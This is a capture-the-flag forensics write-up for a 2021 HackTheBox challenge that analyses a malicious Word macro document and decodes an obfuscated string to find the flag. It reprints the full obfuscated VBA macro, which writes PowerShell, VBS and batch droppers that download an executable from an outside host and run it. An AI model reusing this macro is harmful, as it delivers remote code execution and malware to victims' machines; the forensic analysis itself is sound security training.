Giveaway

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Forensics

PTS: 300

Description:

Santa’s SOC team is working overtime during December due to Christmas phishing campaigns. A new team of malicious actors is targeting mainly those affected by the holiday spirit. Could you analyse the document and find the command & control server?


The downloadable part of this challenge consist in a .docm document and one of the most common attack when we’re talking about this type of file are macros code execution so first thing first we’re going to scan for those.

olevba -c -d christmas_giveaway.docm

As you can see we definitely have something in there.
Saving the first macro, the “Auto_Open()”, echoing it into a file will allow us to take a closer look to its content [full code at the end of the file].

It’s obviously obfuscated using random string as name for variables that contains only 1 letter or classic stringsChecker-eluding methods:

MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1

We’re gonna suppose that they’re collecting data for exfiltrating them later on, most likely at the end of the attack once everything that they could is been collected.
For this reason we’re moving towards the end of the code checking for some clear string that can help us understand what’s going on.

     HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
     cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
     fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
     fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
     ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
     FVpHoEqBKnhPO = Replace("christmas", "i", "1")
     FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

     Open XPFILEDIR For Output As #FileNumber
     Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

     Print #FileNumber, "objXMLHTTP.send() "

This code clearly send data to an host – probably our command and control server – using a objXMLHTTP element, let’s try to retrieve that link.

Using an online compiler and adding some slight modification to that piece of code we can easily decode the URL.
We need to create a new string variable that we’re gonna call “final”, remove the statement that write on a file and replace it with a print-to-console one.

Dim final, strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
final = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO
Console.WriteLine(final)

And this is it.


VBA-code:

Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
     USER = Environ("username")
     PST1 = "adobeacd-update.p" + Chr(115) + "1"
     BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
     ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
     VBT1 = "adobeacd-update." + Chr(118) + "bs"
     VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"


     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
     ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
     MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\Desktop\output3.txt"
     MY_FILDIR = "c:\Users\" + USER + "\Desktop\output2.txt"
     XPFILEDIR = "C:\Users\IEUser\Desktop\output.txt"
     XPBARTFILEDIR = "c:\Windows\Temp\" + BART

      On Error Resume Next
     SetAttr MY_FILENDIR, vbNormal

     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      Kill MY_FILENDIR
     End If

     On Error Resume Next
     SetAttr MY_FILEDIR, vbNormal
     If (Dir(MY_FILEDIR) <> "") Then
      Kill MY_FILEDIR
     End If

     On Error Resume Next
     SetAttr MY_FILDIR, vbNormal
     If (Dir(MY_FILDIR) <> "") Then
      Kill MY_FILDIR
     End If

     On Error Resume Next
     SetAttr XPFILEDIR, vbNormal
     If (Dir(XPFILEDIR) <> "") Then
      Kill XPFILEDIR
     End If

     Dim FileNumber As Integer
     Dim FileNumb As Integer
     Dim FileNu As Integer
     Dim mttt As Integer
     Dim retVal As Variant
     'Dim winver As Integer
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile

     Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next

     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
     For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next


    winver = Val(winverstr)
    WaitFor (1)


If (winver > 5.5) Then
     Open MY_FILENDIR For Output As #FileNumber
     Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
     Print #FileNumber, "$hash = '0';"
     Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
     Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
     Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
     Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
     Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
     Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
     Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
     Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
     Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
     Print #FileNumber, "Start-Sleep -s 15;"
     Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
     Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
     Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
     Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
     Close #FileNumber

    Open MY_FILDIR For Output As #FileNumb
    Print #FileNumb, "Dim dff"
    Print #FileNumb, "dff = 68"
    Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
    Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
    Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
    Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
    Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
    Close #FileNumb

    Open MY_FILEDIR For Output As #FileNu
    Print #FileNu, "@echo off"
    Print #FileNu, "ping 1.1.2.2 -n 2"
    Print #FileNu, "chcp 1251"
    Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
    Print #FileNu, "exit"
    Close #FileNu

    SetAttr MY_FILENDIR, vbNormal
    SetAttr MY_FILEDIR, vbNormal
    SetAttr MY_FILDIR, vbNormal

    WaitFor (1)


End If

If (winver <= 5.5) Then
     Open XPBARTFILEDIR For Output As #FileNu
     Print #FileNu, "@echo off"
     Print #FileNu, "ping 1.1.2.2 -n 2"
     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
     Print #FileNu, "ping 1.1.2.2 -n 2"
     Print #FileNu, "c:\Windows\Temp\444.exe"
     Print #FileNu, ":loop"
     Print #FileNu, "ping 1.1.2.2 -n 1"
     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
     Print #FileNu, "exit"
     Close #FileNu
     WaitFor (2)
     mttt = 88

     Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String

     HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
     cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
     fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
     fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
     ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
     FVpHoEqBKnhPO = Replace("christmas", "i", "1")
     FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

     Open XPFILEDIR For Output As #FileNumber
     Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

     Print #FileNumber, "objXMLHTTP.send() "
     Print #FileNumber, "If objXMLHTTP.Status = 200 Then"

     Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "

     Print #FileNumber, "objADOStream.Open "
     Print #FileNumber, "objADOStream.Type = 1"
     Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
     Print #FileNumber, "objADOStream.Position = 0 "
     Print #FileNumber, "objADOStream.SaveToFile strTecation "
     Print #FileNumber, "objADOStream.Close "
     Print #FileNumber, "Set objADOStream = Nothing "
     Print #FileNumber, "End if "
     Print #FileNumber, "Set objXMLHTTP = Nothing"
     Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
     Close #FileNumber

     WaitFor (1)




End If
End Sub